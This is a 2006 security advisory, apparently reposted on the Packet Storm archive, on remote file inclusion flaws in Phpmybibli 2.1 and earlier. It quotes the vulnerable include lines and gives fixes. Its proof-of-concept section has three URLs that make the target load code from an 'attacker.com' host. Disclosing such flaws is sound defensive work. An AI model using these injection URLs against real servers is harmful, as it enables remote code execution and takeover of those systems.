what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ECHO_ADV_55-2006.txt

ECHO_ADV_55-2006.txt
Posted Oct 20, 2006
Site advisories.echo.or.id

[ECHO_ADV_55$2006] - Phpmybibli 2.1 and prior Multiple Remote File Inclusion Vulnerabilities.

tags | advisory, remote, vulnerability, file inclusion
SHA-256 | ad49962b23256489c40e69c32443fd119f79262a61a087cc9243b43fac12eb04

ECHO_ADV_55-2006.txt

Change Mirror Download
ECHO_ADV_55$2006

-----------------------------------------------------------------------------------------------
[ECHO_ADV_55$2006]Phpmybibli <=2.1 Multiple Remote File Inclusion Vulnerability
-----------------------------------------------------------------------------------------------

Author : Dedi Dwianto a.k.a the_day
Date Found : October, 17th 2006
Location : Indonesia, Jakarta
web : http://advisories.echo.or.id/adv/adv55-theday-2006.txt
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : PHPmybibli
version : <=2.1
URL : http://www.pizz.net/

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

I found vulnerability script cart.php
--------------------------cart.php---------------------------------------
....
<?

include_once("$include_path/cart.inc.php");
include_once("$include_path/templates/cart.tpl.php");
include_once("$include_path/isbn.inc.php");
include_once("$include_path/expl_info.inc.php");
include_once("$include_path/bull_info.inc.php");
include_once("$include_path/notice_authors.inc.php");
include_once("$include_path/notice_categories.inc.php");
include_once("$include_path/explnum.inc.php");
include_once("$class_path/cart.class.php");
include_once("$class_path/caddie.class.php");
include_once("$class_path/author.class.php");
include_once("$class_path/collection.class.php");
include_once("$class_path/subcollection.class.php");
include_once("$class_path/mono_display.class.php");
include_once("$class_path/serie.class.php");
include_once("$class_path/serial_display.class.php");
include_once("$class_path/serials.class.php");
include_once("$class_path/editor.class.php");
require_once("$class_path/emprunteur.class.php");
require_once("$javascript_path/misc.inc.php");
...
----------------------------------------------------------

Input passed to the "$include_path" parameter in cart.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.

Also affected files on Files:

edit.php
circ.php
index.php
select.php
etc..

Proof Of Concept:
~~~~~~~~~~~~~~~

http://target.com/[phpmybibli_path]/index.php?class_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/edit.php?javascript_path=http://attacker.com/inject.txt?
http://target.com/[phpmybibli_path]/circ.php?include_path=http://attacker.com/inject.txt?

Solution:
~~~~~~~

- Sanitize variable $class_path,$javascript_path,$include_path on affected files.
- Turn off register_globals


---------------------------------------------------------------------------

Shoutz:
~~~
~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous
~ Jessy My Brain
~ az001,bomm_3x,matdhule,angelia
~ newbie_hacker@yahoogroups.com
~ #aikmel - #e-c-h-o @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~~~~
EcHo Research & Development Center
the_day[at]echo[dot]or[dot]id

-------------------------------- [ EOF ]----------------------------------
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close